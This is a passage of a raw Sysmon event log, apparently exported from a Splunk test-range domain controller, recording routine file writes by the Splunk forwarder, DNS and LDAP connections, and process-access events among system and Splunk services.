Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77ED0749E6612F9C0F476C4EBF7E7D35,SHA256=977694BBB66ED0A9076DB3DB8D6DE92534F04851CB4A72DE2AA2567854C69088,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:40.202{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F2B8A80C8AC8D01A8E1DAE3A658E3FA,SHA256=1CFC2F243DDB486D41CF5AFCBC921F879AEBDF0BE9018162F66B07075A9D960D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:40.061{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE41D8EF73A26F148A296773C92383D4,SHA256=E73761994B1EBEC45B2ADB5770078B0A6C4DF47DA09BD093BB272985670B9890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:41.249{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A9DDFDAC829EBFCB6798E58256CA8BB,SHA256=CF765AC8DFEB7B40483D65939870AA2B89915D156EE01806AE1CB70EC13A9ABE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:30.173{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60215-false10.0.1.12-8000- 23542300x80000000000000002245371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:42.311{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=638CE898188E3430227ECEAD83F98412,SHA256=8588D1F87147CE9240B2DC616A3D7CF8CB0F8408DC0D8B389CE811D31F9C89A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:42.124{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6224665ABA8A84A59DDE4D472B7D4BC1,SHA256=B927517042603FFAE67E6BBDAEDF79031B21E486C62C60D286427697106B1C6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:43.343{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CEF91B2E4AEB997109D9FF339D14C67,SHA256=08470295A8AE2297F3DE3182A28568995E01C910FD0622FBD7A9A639FE70F6A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:32.251{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local57187- 23542300x80000000000000002245372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:43.139{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F16A6BC1E8AA45EA8ECFF20A3BF2DF9,SHA256=A1A7CEEA4DE59A46DC16FF3402C68E334F5F6880A59F862573B529DA8ED00A1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:44.377{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79DC551334C70F5FAD8B48A9CD05B10A,SHA256=3A234A306235E7FF1E749273F7B6B7D7A504EB36FD6DA6AEE63F9C90621D419E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:33.391{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local64841- 354300x80000000000000002245376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:33.266{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local57187- 23542300x80000000000000002245375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:44.284{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B9713A499833990F8D727C3BDBD862A,SHA256=CFA2B7B1C9936EFAA14924AB5075C5A87300B38096522F57EA9898EEB01617EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:45.405{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A6AD92E608E9D81C26EB7BC7FFBBEFA,SHA256=51C87D3473F9C8D367ADC5313FE47576A9593AC8C6712A94EA6BF2FF1E5B8B20,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:35.204{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60216-false10.0.1.12-8000- 354300x80000000000000002245379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:34.406{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local64841- 23542300x80000000000000002245382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:46.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2714BA6D009158984C6B20E0254F95E8,SHA256=4010715CBED89A42F58910FFB949617576532D02F145BF75998A0D0BF3A7DE93,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:35.953{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-63566-true2001:500:9f:0:0:0:0:42l.root-servers.net53domain 23542300x80000000000000002245383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:47.452{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C1913202FBE703B9FE6D2F4448DAE54,SHA256=42218A3318312A58E6507A329DA24D113F6CAA04D344CAB8AE06C685211D25D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:48.468{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03A30FECA1D1E416CD45E4F678C83465,SHA256=42D589331C8CEF723F329B9E24ECDBCB278CAF069AB4BF37028D212DECDC7A4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:49.499{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E7779DDB4959D175DDB2301D010022C,SHA256=665D8E9EE26C963658F30A9833FB1C3455F5D55587604F0AE4704AFA24DFF6E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:50.546{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B3B8D7411FB084EA82664E6B5F03561,SHA256=FCC411B75851F54B0073110CD96A412A3595E8BFE1B0F43F4A77CF423B26163C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:50.188{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98367868384A3E068BE1F4D7F7C69648,SHA256=57A25DE80DDC637CB44BC87393FBC683F19BE237D9B85128DC68C8F4C6E3E274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:50.188{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0807E43899B875247241D2ABECE74007,SHA256=7C43F1F55C1E02E13975DF06FCBFF60D634D944D8CE52D0A6D96FD66DB80344B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:51.561{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF5E040C9FFB57C12DD3E2B01EA48457,SHA256=F53E9B522C89A162692341071CC2B47A1DAE84CD8A14A351EFE6995F704872E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:41.204{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60218-false10.0.1.12-8000- 354300x80000000000000002245392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:41.001{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60217-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 354300x80000000000000002245391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:41.001{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local60217-true0:0:0:0:0:0:0:1win-dc-974.attackrange.local389ldap 23542300x80000000000000002245390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:51.264{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98367868384A3E068BE1F4D7F7C69648,SHA256=57A25DE80DDC637CB44BC87393FBC683F19BE237D9B85128DC68C8F4C6E3E274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:52.580{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AF09DF55790E605A0BAC37A311D9D49,SHA256=8C9E2D9531FB16BA5B4DE307D4AF124BCC7E5F374F167574C98E2F180E9BF47A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:53.686{05ADC7E1-229F-6039-0D00-00000000AD01}62014144C:\Windows\system32\svchost.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:53.588{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D38D844C114E561FABC48B6AAEBFD99A,SHA256=7B593465F501E0023969684DFD1007D2EEE1CFC90BAABFA50C5591583BC5C197,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245415Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.921{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E92-603E-0EAB-00000000AD01}12828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245414Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.921{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245413Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.921{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245412Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.921{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245411Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.921{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245410Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.921{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6E92-603E-0EAB-00000000AD01}12828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245409Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.921{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E92-603E-0EAB-00000000AD01}12828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245408Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.922{05ADC7E1-6E92-603E-0EAB-00000000AD01}12828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002245407Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.624{05ADC7E1-6E92-603E-0DAB-00000000AD01}91841000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.624{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B2C2CD2A60C5E230F5871BF82EEFB3,SHA256=F3AB16870CBA6487052E99DB7EC1C8355256AEDF5F8D8FCBB1A338290D5B717E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.436{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E92-603E-0DAB-00000000AD01}9184C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:54.421{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 